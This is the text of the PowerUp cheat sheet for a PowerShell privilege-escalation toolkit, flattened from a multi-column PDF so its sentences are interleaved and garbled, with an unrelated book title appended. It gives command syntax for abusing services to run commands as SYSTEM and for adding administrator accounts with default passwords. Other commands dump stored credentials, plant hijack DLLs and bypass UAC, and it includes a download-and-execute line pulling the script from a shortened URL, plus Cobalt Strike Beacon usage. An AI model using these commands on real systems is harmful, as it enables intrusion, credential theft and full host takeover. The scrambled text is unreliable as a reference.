PowerUp Cheat Sheet Weaponizing Service Vulnerabilities Registry Checks
Invoke-ServiceAbuse abuses a vulnerable service’s Get- Checks if the
binPath to execute commands as SYSTEM. RegistryAlwaysInstall "AlwaysInstallElevated" key Install-ServiceBinary installs a malicious C# binary for a Elevated is set. This means that MSI specified service. installation packages always run as SYSTEM. Both cmdlets accept the following parameters (as well as Get- Returns any autologon Getting Started accepting a service names/service object from Get- RegistryAutoLogon credentials from various Note: PowerUp’s ‘bleeding edge’ will always in be the Service on the pipeline): registry locations. development branch of PowerSploit. Service name to abuse. -Name SERVICE Get- Returns autoruns where the Get PowerUp: http://bit.ly/1PdjSHk The username to add -UserName ModifiableRegistryAu current user can modify the Load from disk: 1) C:\> powershell –exec bypass 2) PS (defaults to ‘john’). Domain ‘[DOMAIN\]USER’ toRun binary/script (or its config). C:\> Import-Module PowerUp.ps1 users are not created, only added to the LocalGroup. Miscellaneous Checks Load from GitHub: PS C:\> IEX (New-Object Get- Checks for leftover Net.WebClient).DownloadString("http://bit.ly/1PdjSHk") The password for the added -Password user (defaults to ‘P@55Word’ UnattendedInstallFile unattend.xml files. Load in Cobalt Strike’s Beacon: beacon> powershell- Get-Webconfig Recovers cleartext and ‘Password123!’). import /local/path/to/PowerUp.ps1 , then beacon> encrypted connection powershell Invoke-AllChecks The group to add the user to -LocalGroup “NAME” (default: ‘Administrators’). strings from all web.configs. Getting help: PS C:\> Get-Help Cmdlet-Name [-detailed] [- Credit to Scott Sutherland. full] Custom command to execute. -Command “net…” Get- Returns all privileges for the Most PowerUp functions are implemented in Empire in Install-ServiceBinary backs up the original service path to ProcessTokenPrivilege current (or specified) privesc/powerup/* \orig_path.exe.bak. Restore-ServiceBinary will restore process. this backup binary to its original path. Invoke-PrivescAudit (old Invoke-AllChecks) will run all Get-SiteListPassword Searches for any McAfee current privilege escalation checks detailed in this guide Set-ServiceBinPath can set a service’s binPath without SiteList.xml files and and will output the appropriate abuse function syntax for caling sc.exe. decrypts the contents. anything found. The –HTMLReport flag will write out a DLL Hijacking Helpers HTML version of the report to SYSTEM.username.html. Find-PathDLLHijack checks if the current %PATH% has Enable-Privilege Enables a specific privilege Enumerating Service Vulnerabilities any directories that are writeable by the current user. for the current process. Get-ModifiableService Enumerates all services Weaponizable for Windows 7 with Write-HijackDll and Available privileges can be where the current user can ‘FOLDER\PATH\wlbsctrl.dll’. found with Get- modify the service binPath. Write-HijackDll writes out a self-deleting .bat file to ProcessTokenPrivilege. Get- Enumerates all services \hijackpath\debug.bat that executes a command, and Get- Returns all SIDs that the ModifiableServiceFile where the current user can writes out a hijackable DLL that launches the .bat. It CurrentUserTokenGro current user is a part of even write to the associated accepts the same -UserName/-Password/-Command upSid if the SID is disabled. service binary or its arguments as Invoke-ServiceAbuse as well as: Invoke- Bypasses UAC by performing arguments. Path to write the hijack -DllPath EventVwrBypass an image hijack on the .msc Get-ServiceUnquoted Enumerates all services w/ DLL PATH\wlbsctrl.dll file extension. unquoted binary paths. Manual arch specification. -Architecture [x64/x86] More Information Path of the .bat for the -BatPath PATH\y.bat http://www.harmj0y.net/blog/ hijackable .dll to run.
Version 1.2. Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.
PowerShell SysAdmin Crash Course: Unlock the Full Potential of PowerShell with Advanced Techniques, Automation, Configuration Management and Integration